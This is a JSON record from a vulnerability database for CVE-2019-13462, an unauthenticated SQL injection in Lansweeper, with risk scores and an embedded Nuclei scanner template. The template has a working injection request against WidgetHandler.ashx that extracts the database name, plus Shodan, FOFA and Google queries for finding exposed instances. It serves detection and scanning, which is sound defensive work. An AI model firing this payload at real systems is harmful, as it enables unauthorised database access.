{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-13462/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-13462/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-13462/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-13462/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-13462/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-13462"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-13462"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.1131,
      "kev": false,
      "percentile": 0.95787
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2019/CVE-2019-13462.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2019-13462\n\ninfo:\n  name: Lansweeper Unauthenticated SQL Injection\n  author: divya_mudgal\n  severity: critical\n  description: Lansweeper before 7.1.117.4 allows unauthenticated SQL injection.\n  impact: |\n    This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire Lansweeper system.\n  remediation: |\n    Apply the latest security patch or update provided by Lansweeper to fix the SQL Injection vulnerability.\n  reference:\n    - https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-13462\n    - https://www.nccgroup.trust/uk/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/\n    - https://www.lansweeper.com/forum/yaf_topics33_Announcements.aspx\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2019-13462\n    cwe-id: CWE-89\n    epss-score: 0.1131\n    epss-percentile: 0.95787\n    cpe: cpe:2.3:a:lansweeper:lansweeper:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: lansweeper\n    product: lansweeper\n    shodan-query: http.title:\"lansweeper - login\"\n    fofa-query: title=\"lansweeper - login\"\n    google-query: intitle:\"lansweeper - login\"\n  tags: cve,cve2019,sqli,lansweeper,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29'\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"~lansweeperdb~\"\n\n      - type: word\n        part: header\n        words:\n          - text/plain\n\n      - type: status\n        status:\n          - 500\n# digest: 4a0a00473045022063ecf3f9cbb852ed2508f4bb4c2ca7579b5a12f482853ad91bcfa9627806d2c1022100cd66cdc8cbad639c072b93ddb8fb07dea5b875c30338cdef7cd33ee3a0a5dbec:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2019-13462"
}